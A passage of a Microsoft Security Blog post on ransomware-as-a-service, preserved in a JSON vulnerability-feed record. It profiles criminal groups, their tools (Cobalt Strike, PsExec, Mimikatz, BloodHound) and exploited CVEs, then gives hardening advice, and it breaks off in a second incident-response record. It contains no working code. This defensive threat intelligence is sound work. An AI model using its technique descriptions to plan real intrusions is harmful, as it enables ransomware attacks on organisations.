custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.\n\n### Prioritizing deployment of Active Directory updates\n\nSecurity patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.\n\n### Cloud hardening\n\nAs attackers move towards cloud resources, it\u2019s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. It\u2019s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&amp;CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we&#x27;re introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&amp;A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mmpc", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "href": "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-02-06T16:48:38", "description": "Recently, an organization in the public sector discovered that one of their internet-facing servers was misconfigured and allowed attackers to upload a web shell, which let the adversaries gain a foothold for further compromise. The organization enlisted the services of Microsoft\u2019s Detection and Response Team (DART) to conduct a full incident response and remediate the threat before it could cause further damage.\n\nDART\u2019s investigation showed that the attackers uploaded a web shell in multiple folders on the web server, leading to the subsequent compromise of service accounts and domain admin accounts. This allowed the attackers to perform reconnaissance using _net.exe,_ scan for additional target systems using _nbtstat.exe_, and eventually move laterally using PsExec.\n\nThe attackers installed additional web shells on other systems, as well as a DLL backdoor on an Outlook Web Access (OWA) server. To persist 